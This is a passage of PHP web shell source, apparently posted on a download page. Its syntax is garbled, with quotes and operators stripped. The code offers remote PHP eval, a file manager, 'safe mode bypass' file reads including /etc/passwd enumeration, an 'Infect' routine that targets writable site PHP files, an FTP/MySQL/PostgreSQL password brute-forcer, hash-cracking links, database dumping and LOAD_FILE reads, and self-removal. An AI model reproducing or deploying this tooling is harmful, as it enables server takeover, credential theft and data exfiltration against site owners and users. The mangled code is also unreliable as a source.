tmp preg_replace(!body .*!msiU,,tmp);
tmp preg_replace(!a:\w+ .*!msiU,,tmp);
tmp preg_replace(!h1!msiU,h2,tmp);
tmp preg_replace(!td, th (.*)!msiU,.e, .v, .h, .h th 1,tmp);
tmp preg_replace(!body, td, th, h2, h2 .*!msiU,,tmp);
echo tmp;
echo /divbr;
if(empty(_POST[ajax])!empty(_POST[p1]))
_COOKIE[md5(_SERVER[HTTP_HOST]).ajax] false;
echo h1Execution PHP-code/h1div classcontentform namepf methodpost
onsubmitif(this.ajax.checked)a(null,null,this.code.value);elseg(null,null,this.code.value,\\);return
false;textarea namecode classbigarea
idPhpCode.(!empty(_POST[p1])?htmlspecialchars(_POST[p1]):)./textareainput typesubmit valueEval
stylemargin-top:5px;
echo input typecheckbox nameajax value1 .(_COOKIE[md5(_SERVER[HTTP_HOST]).ajax]?checked:). send using
AJAX/formpre idPhpOutput style.(empty(_POST[p1])?display:none;:).margin-top:5px; classml1;
if(!empty(_POST[p1]))
ob_start();
eval(_POST[p1]);
echo htmlspecialchars(ob_get_clean());
echo /pre/div;
hardFooter();
function actionFilesMan()
if (!empty (_COOKIE[f]))
_COOKIE[f] @unserialize(_COOKIE[f]);
if(!empty(_POST[p1]))
switch(_POST[p1])
case uploadFile:
if ( is_array(_FILES[f][tmp_name]) )
foreach ( _FILES[f][tmp_name] as i tmpName )
if(!@move_uploaded_file(tmpName, _FILES[f][name][i]))
echo Cant upload file!;
break;
case mkdir:
if(!@mkdir(_POST[p2]))
echo Cant create new dir;
break;
case delete:
function deleteDir(path)
path (substr(path,-1)/) ? path:path./;
dh opendir(path);
while ( ( readdir(dh) ) ! false)
path.;
if ( (basename() ..) (basename() .) )
continue;
type filetype();
if (type dir)
deleteDir();
else
@unlink();
closedir(dh);
@rmdir(path);
if(is_array(@_POST[f]))
foreach(_POST[f] as f)
if(f ..)
continue;
f urldecode(f);
if(is_dir(f))
deleteDir(f);
else
@unlink(f);
break;
case paste:
if(_COOKIE[act] copy)
function copy_paste(c,s,d)
if(is_dir(c.s))
mkdir(d.s);
h @opendir(c.s);
while ((f @readdir(h)) ! false)
if ((f ! .) and (f ! ..))
copy_paste(c.s./,f, d.s./);
elseif(is_file(c.s))
@copy(c.s, d.s);
foreach(_COOKIE[f] as f)
copy_paste(_COOKIE[c],f, GLOBALS[cwd]);
elseif(_COOKIE[act] move)
function move_paste(c,s,d)
if(is_dir(c.s))
mkdir(d.s);
h @opendir(c.s);
while ((f @readdir(h)) ! false)
if ((f ! .) and (f ! ..))
copy_paste(c.s./,f, d.s./);
elseif(@is_file(c.s))
@copy(c.s, d.s);
foreach(_COOKIE[f] as f)
@rename(_COOKIE[c].f, GLOBALS[cwd].f);
elseif(_COOKIE[act] zip)
if(class_exists(ZipArchive))
zip new ZipArchive();
if (zip-open(_POST[p2], 1))
chdir(_COOKIE[c]);
foreach(_COOKIE[f] as f)
if(f ..)
continue;
if(@is_file(_COOKIE[c].f))
zip-addFile(_COOKIE[c].f, f);
elseif(@is_dir(_COOKIE[c].f))
iterator new RecursiveIteratorIterator(new RecursiveDirectoryIterator(f./,
FilesystemIterator::SKIP_DOTS));
foreach (iterator as keyvalue)
zip-addFile(realpath(key), key);
chdir(GLOBALS[cwd]);
zip-close();
elseif(_COOKIE[act] unzip)
if(class_exists(ZipArchive))
zip new ZipArchive();
foreach(_COOKIE[f] as f)
if(zip-open(_COOKIE[c].f))
zip-extractTo(GLOBALS[cwd]);
zip-close();
elseif(_COOKIE[act] tar)
chdir(_COOKIE[c]);
_COOKIE[f] array_map(escapeshellarg, _COOKIE[f]);
ex(tar cfzv . escapeshellarg(_POST[p2]) . . implode( , _COOKIE[f]));
chdir(GLOBALS[cwd]);
unset(_COOKIE[f]);
setcookie(f, , time() - 3600);
break;
default:
if(!empty(_POST[p1]))
prototype(act, _POST[p1]);
prototype(f, serialize(@_POST[f]));
prototype(c, @_POST[c]);
break;
hardHeader();
echo h1File manager/h1div classcontentscriptp1_p2_p3_;/script;
dirContent hardScandir(isset(_POST[c])?_POST[c]:GLOBALS[cwd]);
if(dirContent false) echo Can\t open this folder!;hardFooter(); return;
global sort;
sort array(name, 1);
if(!empty(_POST[p1]))
if(preg_match(!s_([A-z]+)_(\d1)!, _POST[p1], match))
sort array(match[1], (int)match[2]);
echo script
function sa()
for(i0;id.files.elements.length;i++)
if(d.files.elements[i].type checkbox)
d.files.elements[i].checked d.files.elements[0].checked;
/script
table width100 classmain cellspacing0 cellpadding2
form namefiles methodposttrth width13pxinput typecheckbox onclicksa() classchkbx/ththa href#
onclickg(\FilesMan\,null,\s_name_.(sort[1]?0:1).\)Name/a/ththa href#
onclickg(\FilesMan\,null,\s_size_.(sort[1]?0:1).\)Size/a/ththa href#
onclickg(\FilesMan\,null,\s_modify_.(sort[1]?0:1).\)Modify/a/ththOwner/Group/ththa href#
onclickg(\FilesMan\,null,\s_perms_.(sort[1]?0:1).\)Permissions/a/ththActions/th/tr;
dirs files array();
n count(dirContent);
for(i0;in;i++)
ow @posix_getpwuid(@fileowner(dirContent[i]));
gr @posix_getgrgid(@filegroup(dirContent[i]));
tmp array(name dirContent[i],
path GLOBALS[cwd].dirContent[i],
modify date(Y-m-d H:i:s, @filemtime(GLOBALS[cwd] . dirContent[i])),
perms viewPermsColor(GLOBALS[cwd] . dirContent[i]),
size @filesize(GLOBALS[cwd].dirContent[i]),
owner ow[name]?ow[name]:@fileowner(dirContent[i]),
group gr[name]?gr[name]:@filegroup(dirContent[i])
);
if(@is_file(GLOBALS[cwd] . dirContent[i]))
files[] array_merge(tmp, array(type file));
elseif(@is_link(GLOBALS[cwd] . dirContent[i]))
dirs[] array_merge(tmp, array(type link, link readlink(tmp[path])));
elseif(@is_dir(GLOBALS[cwd] . dirContent[i])(dirContent[i] ! .))
dirs[] array_merge(tmp, array(type dir));
GLOBALS[sort] sort;
function cmp(a, b)
if(GLOBALS[sort][0] ! size)
return strcmp(strtolower(a[GLOBALS[sort][0]]), strtolower(b[GLOBALS[sort][0]]))*(GLOBALS[sort][1]?1:-1);
else
return ((a[size] b[size]) ? -1 : 1)*(GLOBALS[sort][1]?1:-1);
usort(files, cmp);
usort(dirs, cmp);
files array_merge(dirs, files);
l 0;
foreach(files as f)
echo tr.(l? classl1:).tdinput typecheckbox namef[] value.urlencode(f[name]). classchkbx/tdtda href#
onclick.((f[type]file)?g(\FilesTools\,null,\.urlencode(f[name]).\,
\view\).htmlspecialchars(f[name]):g(\FilesMan\,\.f[path].\); . (empty (f[link]) ? : titlef[link]) . b[ .
htmlspecialchars(f[name]) .
]/b)./a/tdtd.((f[type]file)?viewSize(f[size]):f[type])./tdtd.f[modify]./tdtd.f[owner]./.f[group]./tdtda
href# onclickg(\FilesTools\,null,\.urlencode(f[name]).\,\chmod\).f[perms]
./tdtda classtooltip data-tooltipRename href# onclickg(\FilesTools\,null,\.urlencode(f[name]).\,
\rename\)R/a a classtooltip data-tooltipTouch href# onclickg(\FilesTools\,null,\.urlencode(f[name]).\,
\touch\)T/a.((f[type]file)? a classtooltip data-tooltipFrame href#
onclickg(\FilesTools\,null,\.urlencode(f[name]).\, \frame\)F/a a classtooltip data-tooltipEdit href#
onclickg(\FilesTools\,null,\.urlencode(f[name]).\, \edit\)E/a a classtooltip data-tooltipDownload href#
onclickg(\FilesTools\,null,\.urlencode(f[name]).\, \download\)D/a:)./td/tr;
l l?0:1;
echo tr idfaktd colspan7
input typehidden namene value
input typehidden namea valueFilesMan
input typehidden namec value . htmlspecialchars(GLOBALS[cwd]) .
input typehidden namecharset value. (isset(_POST[charset])?_POST[charset]:).
labelselect namep1option valuecopyCopy/optionoption valuemoveMove/optionoption valuedeleteDelete/option;
if(class_exists(ZipArchive))
echo option valuezip+ zip/optionoption valueunzip- zip/option;
echo option valuetar+ tar.gz/option;
if(!empty(_COOKIE[act]) @count(_COOKIE[f]))
echo option valuepaste Paste/option;
echo /select/label;
if(!empty(_COOKIE[act]) @count(_COOKIE[f]) ((_COOKIE[act] zip) (_COOKIE[act] tar)))
echo nbsp;file name: input typetext namep2 valuehard_ . date(Ymd_His) . . . (_COOKIE[act] zip?zip:tar.gz)
. nbsp;;
echo input typesubmit value/td/tr/form/table/div;
hardFooter();
function actionStringTools()
if(!function_exists(hex2bin)) function hex2bin(p) return decbin(hexdec(p));
if(!function_exists(binhex)) function binhex(p) return dechex(bindec(p));
if(!function_exists(hex2ascii)) function
hex2ascii(p)r;for(i0;istrLen(p);i+2)r.chr(hexdec(p[i].p[i+1]));return r;
if(!function_exists(ascii2hex)) function ascii2hex(p)r;for(i0;istrlen(p);++i)r.
sprintf(02X,ord(p[i]));return strtoupper(r);
if(!function_exists(full_urlencode)) function full_urlencode(p)r;for(i0;istrlen(p);++i)r.
.dechex(ord(p[i]));return strtoupper(r);
stringTools array(
Base64 encode base64_encode,
Base64 decode base64_decode,
Url encode urlencode,
Url decode urldecode,
Full urlencode full_urlencode,
md5 hash md5,
sha1 hash sha1,
crypt crypt,
CRC32 crc32,
ASCII to HEX ascii2hex,
HEX to ASCII hex2ascii,
HEX to DEC hexdec,
HEX to BIN hex2bin,
DEC to HEX dechex,
DEC to BIN decbin,
BIN to HEX binhex,
BIN to DEC bindec,
String to lower case strtolower,
String to upper case strtoupper,
Htmlspecialchars htmlspecialchars,
String length strlen,
);
if(isset(_POST[ajax]))
prototype(md5(_SERVER[HTTP_HOST]).ajax, true);
ob_start();
if(in_array(_POST[p1], stringTools))
echo _POST[p1](_POST[p2]);
temp
document.getElementById(strOutput).style.display;document.getElementById(strOutput).innerHTML.addcslashes(htmlspecialchars(ob_get_clean()),\n\r\t\\\0).;\n;
echo strlen(temp), \n, temp;
exit;
if(empty(_POST[ajax])!empty(_POST[p1]))
prototype(md5(_SERVER[HTTP_HOST]).ajax, 0);
hardHeader();
echo h1String conversions/h1div classcontent;
echo form nametoolsForm
onSubmitif(this.ajax.checked)a(null,null,this.selectTool.value,this.input.value);elseg(null,null,this.selectTool.value,this.input.value);
return false;labelselect nameselectTool;
foreach(stringTools as k v)
echo option value.htmlspecialchars(v)..k./option;
echo /select/labelinput typesubmit value/ input typecheckbox nameajax value1
.(@_COOKIE[md5(_SERVER[HTTP_HOST]).ajax]?checked:). send using AJAXbrtextarea nameinput
stylemargin-top:5px classbigarea.(empty(_POST[p1])?:htmlspecialchars(@_POST[p2]))./textarea/formpre
classml1 style.(empty(_POST[p1])?display:none;:).margin-top:5px idstrOutput;
if(!empty(_POST[p1]))
if(in_array(_POST[p1], stringTools))echo htmlspecialchars(_POST[p1](_POST[p2]));
echo/pre/divbrh1Search files:/h1div classcontent
form onsubmit\g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\table
cellpadding1 cellspacing0 width50
trtd width1Text:/tdtdinput typetext nametext stylewidth:100/td/tr
trtdPath:/tdtdinput typetext namecwd value. htmlspecialchars(GLOBALS[cwd]) . stylewidth:100/td/tr
trtdName:/tdtdinput typetext namefilename value* stylewidth:100/td/tr
trtd/tdtdinput typesubmit value/td/tr
/table/form;
function hardRecursiveGlob(path)
if(substr(path, -1) ! /)
path./;
paths @array_unique(@array_merge(@glob(path._POST[p3]), @glob(path.*, GLOB_ONLYDIR)));
if(is_array(paths)@count(paths))
foreach(paths as )
if(@is_dir())
if(path!)
hardRecursiveGlob();
else
if(empty(_POST[p2]) @strpos(file_get_contents(), _POST[p2])!false)
echo a href# onclickg(\FilesTools\,null,\.urlencode().\, \view\,\\).htmlspecialchars()./abr;
if(@_POST[p3])
hardRecursiveGlob(_POST[c]);
echo /divbrh1Search for hash:/h1div classcontent
form methodpost target_blank namehf
input typetext namehash stylewidth:200px;br
input typehidden nameact valuefind/
input typesubmit valuehashcracking.ru
onclick\document.hf.actionhttps://hashcracking.ru/index.php;document.hf.submit()\br
input typesubmit valuemd5.rednoize.com
onclick\document.hf.actionhttp://md5.rednoize.com/?q+document.hf.hash.value+smd5;document.hf.submit()\br
input typesubmit valuefakenamegenerator.com
onclick\document.hf.actionhttp://www.fakenamegenerator.com/;document.hf.submit()\br
input typesubmit valuehashcrack.com
onclick\document.hf.actionhttp://www.hashcrack.com/index.php;document.hf.submit()\br
input typesubmit valuetools4noobs.com
onclick\document.hf.actionhttp://www.tools4noobs.com/online_php_functions/;document.hf.submit()\br
input typesubmit valuefopo.com.ar onclick\document.hf.actionhttp://fopo.com.ar/;document.hf.submit()\br
input typesubmit valuemd5decrypter.com
onclick\document.hf.actionhttp://www.md5decrypter.com/;document.hf.submit()\br
input typesubmit valueartlebedev.ru
onclick\document.hf.actionhttps://www.artlebedev.ru/tools/decoder/;document.hf.submit()\br
/form/div;
hardFooter();
function actionSafeMode()
temp;
ob_start();
switch(_POST[p1])
case 1:
temp@tempnam(test, cx);
if(@copy(compress.zlib://._POST[p2], temp))
echo @file_get_contents(temp);
unlink(temp);
else
echo Sorry... Can\t open file;
break;
case 2:
files glob(_POST[p2].*);
if( is_array(files) )
foreach (files as filename)
echo filename.\n;
break;
case 3:
ch curl_init(file://._POST[p2].\x00.SELF_PATH);
curl_exec(ch);
break;
case 4:
ini_restore(safe_mode);
ini_restore(open_basedir);
include(_POST[p2]);
break;
case 5:
for(;_POST[p2] _POST[p3];_POST[p2]++)
uid @posix_getpwuid(_POST[p2]);
if (uid)
echo join(:,uid).\n;
break;
case 6:
if(!function_exists(imap_open))break;
stream imap_open(_POST[p2], , );
if (stream FALSE)
break;
echo imap_body(stream, 1);
imap_close(stream);
break;
temp ob_get_clean();
hardHeader();
echo h1Safe mode bypass/h1div classcontent;
echo spanCopy (read file)/spanform onsubmit\g(null,null,1,this.param.value);return false;\input
classtoolsInp typetext nameparaminput typesubmit value/formbrspanGlob (list dir)/spanform
onsubmit\g(null,null,2,this.param.value);return false;\input classtoolsInp typetext nameparaminput
typesubmit value/formbrspanCurl (read file)/spanform onsubmit\g(null,null,3,this.param.value);return
false;\input classtoolsInp typetext nameparaminput typesubmit value/formbrspanIni_restore (read
file)/spanform onsubmit\g(null,null,4,this.param.value);return false;\input classtoolsInp typetext
nameparaminput typesubmit value/formbrspanPosix_getpwuid (Read /etc/passwd)/spantableform
onsubmit\g(null,null,5,this.param1.value,this.param2.value);return false;\trtdFrom/tdtdinput typetext
nameparam1 value0/td/trtrtdTo/tdtdinput typetext nameparam2 value1000/td/tr/tableinput typesubmit
value/formbrbrspanImap_open (read file)/spanform onsubmit\g(null,null,6,this.param.value);return
false;\input typetext nameparaminput typesubmit value/form;
if(temp)
echo pre classml1 stylemargin-top:5px idOutput.temp./pre;
echo /div;
hardFooter();
function actionLogout()
setcookie(md5(_SERVER[HTTP_HOST]), , time() - 3600);
die(bye!);
function actionSelfRemove()
if(_POST[p1] yes)
if(@unlink(preg_replace(!\(\d+\)\s.*!, , __FILE__)))
die(Shell has been removed);
else
echo unlink error!;
if(_POST[p1] ! yes)
hardHeader();
echo h1Suicide/h1div classcontentReally want to remove the shell?bra href#
onclickg(null,null,\yes\)Yes/a/div;
hardFooter();
function actionInfect()
hardHeader();
echo h1Infect/h1div classcontent;
if(_POST[p1] infect)
target_SERVER[DOCUMENT_ROOT];
function ListFiles(dir)
if(dh opendir(dir))
files Array();
inner_files Array();
while(file readdir(dh))
if(file ! . file ! ..)
if(is_dir(dir . / . file))
inner_files ListFiles(dir . / . file);
if(is_array(inner_files)) files array_merge(files, inner_files);
else
array_push(files, dir . / . file);
closedir(dh);
return files;
foreach (ListFiles(target) as keyfile)
nFile substr(file, -4, 4);
if(nFile .php )
if((file_SERVER[DOCUMENT_ROOT]._SERVER[PHP_SELF])(is_writeable(file)))
echo filebr;
i++;
echo font colorred size14i/font;
else
echo form methodpostinput typesubmit valueInfect nameinfet/form;
echo Really want to infect the server?nbsp;a href# onclickg(null,null,\infect\)Yes/a/div;
hardFooter();
function actionBruteforce()
hardHeader();
if( isset(_POST[proto]) )
echo h1Results/h1div classcontentspanType:/span .htmlspecialchars(_POST[proto]). spanServer:/span
.htmlspecialchars(_POST[server]).br;
if( _POST[proto] ftp )
function bruteForce(ip,port,login,pass)
fp @ftp_connect(ip, port?port:21);
if(!fp) return false;
res @ftp_login(fp, login, pass);
@ftp_close(fp);
return res;
elseif( _POST[proto] mysql )
function bruteForce(ip,port,login,pass)
res @mysql_connect(ip.:.(port?port:3306), login, pass);
@mysql_close(res);
return res;
elseif( _POST[proto] pgsql )
function bruteForce(ip,port,login,pass)
str host.ip. port.port. user.login. password.pass. dbnamepostgres;
res @pg_connect(str);
@pg_close(res);
return res;
success 0;
attempts 0;
server explode(:, _POST[server]);
if(_POST[type] 1)
temp @file(/etc/passwd);
if( is_array(temp) )
foreach(temp as line)
line explode(:, line);
++attempts;
if( bruteForce(@server[0],@server[1], line[0], line[0]) )
success++;
echo b.htmlspecialchars(line[0])./b:.htmlspecialchars(line[0]).br;
if(@_POST[reverse])
tmp ;
for(istrlen(line[0])-1; i0; --i)
tmp . line[0][i];
++attempts;
if( bruteForce(@server[0],@server[1], line[0], tmp) )
success++;
echo b.htmlspecialchars(line[0])./b:.htmlspecialchars(tmp);
elseif(_POST[type] 2)
temp @file(_POST[dict]);
if( is_array(temp) )
foreach(temp as line)
line trim(line);
++attempts;
if( bruteForce(server[0],@server[1], _POST[login], line) )
success++;
echo b.htmlspecialchars(_POST[login])./b:.htmlspecialchars(line).br;
echo spanAttempts:/span attempts spanSuccess:/span success/divbr;
echo h1FTP bruteforce/h1div classcontenttableform methodposttrtdspanType/span/td
.tdlabelselect nameprotooption valueftpFTP/optionoption valuemysqlMySql/optionoption
valuepgsqlPostgreSql/option/select/label/td/trtrtd
.input typehidden namec value.htmlspecialchars(GLOBALS[cwd]).
.input typehidden namea value.htmlspecialchars(_POST[a]).
.input typehidden namecharset value.htmlspecialchars(_POST[charset]).
.input typehidden namene value
.spanServer:port/span/td
.tdinput typetext nameserver value127.0.0.1/td/tr
.trtdspanBrute type/span/td
.tdinput typeradio nametype value1 checked /etc/passwd/td/tr
.trtd/tdtd stylepadding-left:15pxinput typecheckbox namereverse value1 checked reverse (login -
nigol)/td/tr
.trtd/tdtdinput typeradio nametype value2 Dictionary/td/tr
.trtd/tdtdtable stylepadding-left:15pxtrtdspanLogin/span/td
.tdinput typetext namelogin valueroot/td/tr
.trtdspanDictionary/span/td
.tdinput typetext namedict value.htmlspecialchars(GLOBALS[cwd]).passwd.dic/td/tr/table
./td/trtrtd/tdtdinput typesubmit value/td/tr/form/table;
echo /divbr;
hardFooter();
function actionSql()
class DbClass
var type;
var link;
var res;
function DbClass(type)
this-type type;
function connect(host, user, pass, dbname)
switch(this-type)
case mysql:
if( this-link @mysql_connect(host,user,pass,true) ) return true;
break;
case pgsql:
host explode(:, host);
if(!host[1]) host[1]5432;
if( this-link @pg_connect(hosthost[0] porthost[1] useruser passwordpass dbnamedbname) ) return true;
break;
return false;
function selectdb(db)
switch(this-type)
case mysql:
if (@mysql_select_db(db))return true;
break;
return false;
function query(str)
switch(this-type)
case mysql:
return this-res @mysql_query(str);
break;
case pgsql:
return this-res @pg_query(this-link,str);
break;
return false;
function fetch()
res func_num_args()?func_get_arg(0):this-res;
switch(this-type)
case mysql:
return @mysql_fetch_assoc(res);
break;
case pgsql:
return @pg_fetch_assoc(res);
break;
return false;
function listDbs()
switch(this-type)
case mysql:
return this-query(SHOW databases);
break;
case pgsql:
return this-res this-query(SELECT datname FROM pg_database WHERE datistemplate!t);
break;
return false;
function listTables()
switch(this-type)
case mysql:
return this-res this-query(SHOW TABLES);
break;
case pgsql:
return this-res this-query(select table_name from information_schema.tables where table_schema !
information_schema AND table_schema ! pg_catalog);
break;
return false;
function error()
switch(this-type)
case mysql:
return @mysql_error();
break;
case pgsql:
return @pg_last_error();
break;
return false;
function setCharset(str)
switch(this-type)
case mysql:
if(function_exists(mysql_set_charset))
return @mysql_set_charset(str, this-link);
else
this-query(SET CHARSET .str);
break;
case pgsql:
return @pg_set_client_encoding(this-link, str);
break;
return false;
function loadFile(str)
switch(this-type)
case mysql:
return this-fetch(this-query(SELECT LOAD_FILE(.addslashes(str).) as file));
break;
case pgsql:
this-query(CREATE TABLE hard2(file text);COPY hard2 FROM .addslashes(str).;select file from hard2;);
rarray();
while(ithis-fetch())
r[] i[file];
this-query(drop table hard2);
return array(fileimplode(\n,r));
break;
return false;
function dump(table, fp false)
switch(this-type)
case mysql:
res this-query(SHOW CREATE TABLE .table.);
create mysql_fetch_array(res);
sql create[1].;\n;
if(fp) fwrite(fp, sql); else echo(sql);
this-query(SELECT * FROM .table.);
i 0;
head true;
while( this-fetch())
sql ;
if(i 1000 0)
head true;
sql ;\n\n;
columns array();
foreach( as kv)
if(v null)
[k] NULL;
elseif(is_int(v))
[k] v;
else
[k] .@mysql_real_escape_string(v).;
columns[] .k.;
if(head)
sql . INSERT INTO .table. (.implode(, , columns).) VALUES \n\t(.implode(, , ).);
head false;
else
sql . \n\t,(.implode(, , ).);
if(fp) fwrite(fp, sql); else echo(sql);
i++;
if(!head)
if(fp) fwrite(fp, ;\n\n); else echo(;\n\n);
break;
case pgsql:
this-query(SELECT * FROM .table);
while( this-fetch())
columns array();
foreach( as kv)
[k] .addslashes(v).;
columns[] k;
sql INSERT INTO .table. (.implode(, , columns).) VALUES (.implode(, , ).);.\n;
if(fp) fwrite(fp, sql); else echo(sql);
break;
return false;
;
db new DbClass(_POST[type]);
if((@_POST[p2]download) (@_POST[p1]!select))
db-connect(_POST[sql_host], _POST[sql_login], _POST[sql_pass], _POST[sql_base]);
db-selectdb(_POST[sql_base]);
switch(_POST[charset])
case Windows-1251: db-setCharset(cp1251); break;
case UTF-8: db-setCharset(utf8); break;
case KOI8-R: db-setCharset(koi8r); break;
case KOI8-U: db-setCharset(koi8u); break;
case cp866: db-setCharset(cp866); break;
if(empty(_POST[file]))
ob_start(ob_gzhandler, 4096);
header(Content-Disposition: attachment; filenamedump.sql);
header(Content-Type: text/plain);
foreach(_POST[tbl] as v)
db-dump(v);
exit;
elseif(fp @fopen(_POST[file], w))
foreach(_POST[tbl] as v)
db-dump(v, fp);
fclose(fp);
unset(_POST[p2]);
else
die(scriptalert(Error! Can\t open file);window.history.back(-1)/script);
hardHeader();
echo
h1Sql browser/h1div classcontent
form namesf methodpost onsubmitfs(this);table cellpadding2 cellspacing0tr
tdType/tdtdHost/tdtdLogin/tdtdPassword/tdtdDatabase/tdtd/td/trtr
input typehidden namene valueinput typehidden name
Download nfogen1.nfo
Download Noticegen1.rar



Comments for "gen1"

No comments yet.



You must login to post a comment!